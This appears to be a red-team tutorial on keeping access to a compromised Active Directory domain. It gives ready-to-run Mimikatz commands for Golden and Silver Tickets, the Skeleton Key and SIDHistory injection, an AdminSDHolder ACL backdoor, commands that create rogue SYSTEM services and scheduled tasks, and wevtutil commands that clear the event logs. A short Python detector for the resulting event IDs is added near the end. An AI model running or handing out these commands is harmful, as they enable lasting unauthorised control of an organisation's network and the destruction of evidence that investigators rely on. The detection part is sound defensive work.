Active Directory Persistence, Detection Evasion & Cleanup
Once you have Domain Admin or full control of the domain, the game changes. You’re no longer trying to get in — you’re trying to stay in, quietly, for as long as possible.
This phase covers how attackers create backdoors, avoid detection, and remove their tracks after a successful AD compromise.
What This Phase Is About
- Persistence – Establishing long-term access even if passwords change
- Detection Evasion – Avoiding logs, alerts, and behavioral analysis
- Cleanup – Erasing signs of the breach to avoid investigation or forensic review
Techniques Covered
- Golden Ticket
- Silver Ticket
- Skeleton Key
- SIDHistory Abuse
- AdminSDHolder Backdoor
- GPO Backdoors
- Registry and Service Modifications
- Log Clearing
1. Golden Ticket Attack
The Golden Ticket is a forged Ticket Granting Ticket (TGT), signed with the KRBTGT account hash, that gives you unlimited domain access.
With Mimikatz:

```text
kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-xxxxx /krbtgt:<NTLM_HASH> /id:500
```

Then inject the ticket:

```text
kerberos::ptt golden.kirbi
```
Result: You now have indefinite access to any domain resource, without needing valid credentials.
2. Silver Ticket Attack
Silver Tickets are forged service tickets (TGS tickets) for specific services — stealthier but more limited.

```text
kerberos::golden /user:svc_web /domain:corp.local /sid:S-1-5-21-xxxxx /target:web.corp.local /service:cifs /rc4:<NTLM_HASH> /id:1105
```

Then:

```text
kerberos::ptt silver.kirbi
```

Use when: You only need access to one service and you want to avoid generating ticket requests at the KDC.
3. Skeleton Key Attack
Patches LSASS on the Domain Controller so that a second, master password is accepted for any domain user alongside the real one.

```text
misc::skeleton
```

Default password: mimikatz
Use with caution — very noisy, detectable with memory scanners, and it does not survive a reboot of the DC.
4. SIDHistory Injection
Abuse SIDHistory to give an account the privileges of another user or group.

```text
sid::patch
sid::inject /sids:S-1-5-21-<DA_SID>
```

This gives a low-privilege user Domain Admin privileges through SID inheritance.
5. AdminSDHolder Backdoor (Persistence)
Modify the ACL of AdminSDHolder so that your user retains privileged permissions, even after the permissions are reset.

```text
Set-DomainObjectACL -TargetDistinguishedName "CN=AdminSDHolder,CN=System,DC=corp,DC=local" -Rights All -PrincipalIdentity youruser
```

Every 60 minutes, the SDProp process copies this ACL onto Domain Admins and the other protected accounts.
6. GPO Backdoors
Deploy a GPO that creates a local admin or adds your user to a privileged group.
- Use Group Policy Preferences to drop a file or set a scheduled task
- Add a new local admin via a Registry key or a file copied into SYSVOL
Be careful — changes here are often logged.
7. Creating Rogue Services or Scheduled Tasks
Install a hidden service or task that runs as SYSTEM:

```text
sc.exe create "WindowsUpdateService" binPath= "cmd.exe /c whoami > C:\temp\out.txt" start= auto
```

Or:

```text
schtasks /create /tn "UpdateTask" /tr "powershell.exe -enc ..." /sc minute /mo 5 /ru SYSTEM
```
8. Clearing Logs
Caution: clearing logs can raise red flags, but attackers do it anyway. Clearing the Security log itself writes Event ID 1102 (and clearing System or Application writes Event ID 104), which most SIEMs alert on.

```text
wevtutil cl System
wevtutil cl Security
wevtutil cl Application
```
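As an added defensive example (not part of the original post), the Python below runs a small detector over constructed Windows event records and flags the artifacts sections 7 and 8 leave behind: Event ID 7045 (service installed) with an interpreter in its ImagePath, 4698 (scheduled task created) whose task XML launches an interpreter or an encoded PowerShell command, and 1102/104 (Security or System log cleared). The field names follow the usual EVTX-to-JSON layout a SIEM exports; the sample records are constructed, not captured from a real host.

```python
import re

# Constructed sample events shaped like EVTX-to-JSON records (not real captures).
SAMPLE_EVENTS = [
    {"EventID": 7045, "Channel": "System", "ServiceName": "WindowsUpdateService",
     "ImagePath": r"cmd.exe /c whoami > C:\temp\out.txt", "StartType": "auto start"},
    {"EventID": 7045, "Channel": "System", "ServiceName": "Spooler",
     "ImagePath": r"C:\Windows\System32\spoolsv.exe", "StartType": "auto start"},
    {"EventID": 4698, "Channel": "Security", "TaskName": r"\UpdateTask",
     "TaskContent": "<Command>powershell.exe</Command><Arguments>-enc AAAA</Arguments>"},
    {"EventID": 4698, "Channel": "Security", "TaskName": r"\Microsoft\Windows\Defrag\ScheduledDefrag",
     "TaskContent": "<Command>%windir%\\system32\\defrag.exe</Command>"},
    {"EventID": 1102, "Channel": "Security", "SubjectUserName": "Administrator"},
    {"EventID": 104, "Channel": "System", "SubjectUserName": "Administrator"},
]

# Script hosts and shells that rarely belong in a service ImagePath or a task <Command>.
INTERPRETER_RE = re.compile(r"\b(cmd|powershell|pwsh|wscript|cscript|mshta|rundll32)(\.exe)?\b", re.I)
# PowerShell's encoded-command switch in any of its accepted abbreviations.
ENCODED_RE = re.compile(r"(?<![\w-])-(e|ec|enc|encodedcommand)\b", re.I)

def classify(event):
    """Return a finding string for a suspicious event, or None if it looks benign."""
    eid = event.get("EventID")
    if eid == 7045:  # new service installed
        path = event.get("ImagePath", "")
        if INTERPRETER_RE.search(path):
            return f"service '{event.get('ServiceName')}' runs an interpreter: {path}"
    elif eid == 4698:  # scheduled task created
        content = event.get("TaskContent", "")
        if INTERPRETER_RE.search(content) or ENCODED_RE.search(content):
            return f"task '{event.get('TaskName')}' launches an interpreter or encoded command"
    elif eid == 1102:  # Security log cleared
        return f"Security log cleared by {event.get('SubjectUserName')}"
    elif eid == 104:  # System/Application log cleared
        return f"{event.get('Channel')} log cleared by {event.get('SubjectUserName')}"
    return None

def detect_persistence(events):
    """Run classify() over an event stream and return (EventID, finding) pairs."""
    findings = []
    for ev in events:
        finding = classify(ev)
        if finding:
            findings.append((ev["EventID"], finding))
    return findings

if __name__ == "__main__":
    for eid, finding in detect_persistence(SAMPLE_EVENTS):
        print(eid, finding)
```

On the sample stream the benign Spooler service and the built-in defrag task pass, while the interpreter-backed service, the encoded-PowerShell task and both log-clear events are reported.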
Summary
| Technique | Purpose | Risk Level |
|---|---|---|
| Golden Ticket | Domain-wide access anytime | High, detectable |
| Silver Ticket | Service-level stealth access | Medium |
| SIDHistory | Hidden privilege escalation | High, often logged |
| AdminSDHolder Abuse | Persistent privilege ownership | Medium |
| Skeleton Key | Master password for all users | Very high/noisy |
| GPO Backdoor | Privileged re-entry via policies | High, traceable |
| Rogue Services/Tasks | Scheduled access or code exec | Medium |
| Log Clearing | Hide activity trails | High, monitored |
Final Note
This phase is about control and stealth. In a red team or pentest engagement, you’d rarely go this far unless you’re simulating advanced persistent threats (APTs) or testing blue team detection.
Use these techniques wisely and ethically. Also, practice them in isolated labs where you can safely see how they work.
